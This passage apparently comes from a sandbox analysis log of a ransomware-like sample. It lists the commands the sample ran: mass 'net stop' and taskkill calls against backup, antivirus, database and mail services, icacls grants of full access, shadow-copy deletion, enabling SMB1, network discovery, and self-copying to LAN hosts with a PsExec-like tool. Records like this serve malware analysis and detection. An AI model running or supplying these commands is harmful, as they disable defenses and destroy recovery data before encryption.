C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:10592
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:5172
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:11456
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploySvc /y2⤵PID:5552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵PID:12808
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSA /y2⤵PID:6712
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵PID:15160
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵PID:8472
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:15244
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵PID:8464
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:14744
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵PID:8456
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:14272
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵PID:8448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:15356
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:8440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:15316
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
PID:7204
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4760
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.302⤵PID:14508
-
-
C:\Users\Admin\AppData\Local\Temp\z0scf5zo.exe"C:\Users\Admin\AppData\Local\Temp\z0scf5zo.exe" \\10.10.0.30 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe"2⤵PID:5312
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c net view2⤵PID:13284
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵PID:13276
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:12476
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:11728
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵PID:11568
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵PID:11484
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:13868
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.212⤵PID:12708
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵PID:9900
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵PID:9440
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵PID:9432
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵PID:9420
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵PID:9404
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵PID:9396
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
PID:9388
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵PID:9380
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
PID:9372
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵PID:9364
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵PID:9356
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
PID:9348
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
PID:9340
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵PID:9332
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵PID:9324
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵PID:9316
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵PID:9300
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
PID:9292
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
PID:9284
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵PID:9276
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵PID:9264
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
PID:9252
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
PID:9244
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
PID:9236
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
PID:9228
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵PID:8212
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵PID:4600
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵PID:6576
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵PID:5108
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
PID:7220
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
PID:4456
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵PID:4168
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵PID:4784
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
PID:3756
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
PID:4588
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
PID:5612
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
PID:8164
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵PID:7300
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵PID:7348
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
PID:7372
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵PID:7412
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
PID:7452
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
PID:7484
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵PID:5012
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵PID:5076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵PID:10436
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵PID:7784
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ntrtscan /y2⤵PID:5044
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:8544
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:8424
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:8408
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:8400
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:8392
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵PID:8384
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DCAgent /y2⤵PID:7904
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:7896
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:7884
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AVP /y2⤵PID:7868
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:7860
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵PID:7852
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:7840
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Antivirus /y2⤵PID:7832
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵PID:7816
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:7804
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:7796
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROD /y2⤵PID:7788
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:7772
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵PID:7764
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵PID:7756
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵PID:7744
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵PID:7736
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵PID:7720
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:7712
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵PID:7704
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop audioendpointbuilder /y2⤵PID:7692
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵PID:7684
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:7676
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Message Router” /y2⤵PID:7668
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵PID:7660
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵PID:7652
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ARSM /y2⤵PID:6892
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵PID:6884
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeimap4 /y2⤵PID:6876
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵PID:6868
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵PID:6860
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:6852
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵PID:6840
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeadtopology /y2⤵PID:6832
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵PID:6816
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPS /y2⤵PID:6808
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵PID:6800
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵PID:6792
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Health Service” /y2⤵PID:6776
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSRS /y2⤵PID:6768
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop W3Svc /y2⤵PID:6760
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵PID:6752
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵PID:6736
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPS /y2⤵PID:6728
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵PID:6720
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop UI0Detect /y2⤵PID:6696
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵PID:6688
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵PID:6680
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵PID:6664
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵PID:6656
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMTA /y2⤵PID:6648
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SstpSvc /y2⤵PID:6632
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msftesql$PROD /y2⤵PID:6620
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵PID:6612
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:6604
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SMTPSvc /y2⤵PID:6596
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵PID:6588
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMGMT /y2⤵PID:6580
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop POP3Svc /y2⤵PID:6564
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer110 /y2⤵PID:6556
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵PID:6548
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer /y2⤵PID:6540
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SamSs /y2⤵PID:6532
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵PID:6524
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeIS /y2⤵PID:6508
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetMsmqActivator /y2⤵PID:6492
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer100 /y2⤵PID:6484
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQL Backups /y2⤵PID:6476
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵PID:6464
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EraserSvc11710 /y2⤵PID:6452
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Agent” /y2⤵PID:6444
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeES /y2⤵PID:6436
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop IISAdmin /y2⤵PID:6420
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer /y2⤵PID:6412
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵PID:6404
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵PID:6396
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:6380
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:6372
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:6364
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:6356
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:6340
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:6332
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:6324
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:6308
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:6300
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vapiendpoint /y2⤵PID:6292
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵PID:6284
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop WRSVC /y2⤵PID:6268
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵PID:6260
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵PID:6252
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY /y2⤵PID:6244
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyScheduler /y2⤵PID:6228
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵PID:6220
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKey /y2⤵PID:6204
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSafeOLRService /y2⤵PID:6188
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop tmlisten /y2⤵PID:6176
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLBrowser /y2⤵PID:6168
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TmCCSF /y2⤵PID:6160
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:5264
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update_64 /y2⤵PID:5036
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:4376
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update /y2⤵PID:6140
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵PID:6132
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_service /y2⤵PID:6124
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPS /y2⤵PID:6116
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_filter /y2⤵PID:6100
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵PID:6092
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop svcGenericHost /y2⤵PID:6084
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵PID:6076
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵PID:6068
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.112⤵PID:14452
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.142⤵PID:14896
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.302⤵PID:11152
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.332⤵PID:10188
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.362⤵PID:11756
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.382⤵PID:13012
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵PID:6060
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophossps /y2⤵PID:6044
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:6036
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SntpService /y2⤵PID:6028
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:6016
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SmcService /y2⤵PID:6008
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵PID:5992
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Smcinst /y2⤵PID:5984
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROD /y2⤵PID:5976
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ShMonitor /y2⤵PID:5960
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵PID:5952
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SepMasterService /y2⤵PID:5944
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵PID:5928
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVService /y2⤵PID:5920
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵PID:5912
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVAdminService /y2⤵PID:5896
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵PID:5888
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sacsvr /y2⤵PID:5880
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵PID:5872
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵PID:5856
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵PID:5848
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sms_site_sql_backup /y2⤵PID:5840
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfevtp /y2⤵PID:5820
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RESvc /y2⤵PID:5812
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵PID:5804
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfemms /y2⤵PID:5788
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:5780
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵PID:5772
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfefire /y2⤵PID:5764
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop OracleClientCache80 /y2⤵PID:5748
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:5740
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McTaskManager /y2⤵PID:5732
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL80 /y2⤵PID:5716
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamRESTSvc /y2⤵PID:5708
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McShield /y2⤵PID:5700
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL57 /y2⤵PID:5684
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:5676
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵PID:5668
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵PID:5656
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamMountSvc /y2⤵PID:5640
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFramework /y2⤵PID:5632
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵PID:5624
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵PID:5616
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeEngineService /y2⤵PID:5600
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵PID:5592
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵PID:5576
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBEndpointAgent /y2⤵PID:5568
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLSERVER /y2⤵PID:5560
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBAMService /y2⤵PID:5544
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵PID:5536
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:5528
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop masvc /y2⤵PID:5516
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵PID:5500
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCloudSvc /y2⤵PID:5492
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop macmnsvc /y2⤵PID:5484
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵PID:5476
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵PID:5464
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop klnagent /y2⤵PID:5456
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵PID:5448
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵PID:5440
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop kavfsslp /y2⤵PID:5432
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵PID:5420
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBackupSvc /y2⤵PID:5412
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFSGT /y2⤵PID:5404
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:5396
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLWriter /y2⤵PID:5388
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFS /y2⤵PID:5376
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵PID:5368
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:5360
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FA_Scheduler /y2⤵PID:5352
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:5344
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SDRSVC /y2⤵PID:5332
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ESHASRV /y2⤵PID:5324
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:5316
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:5308
-
-
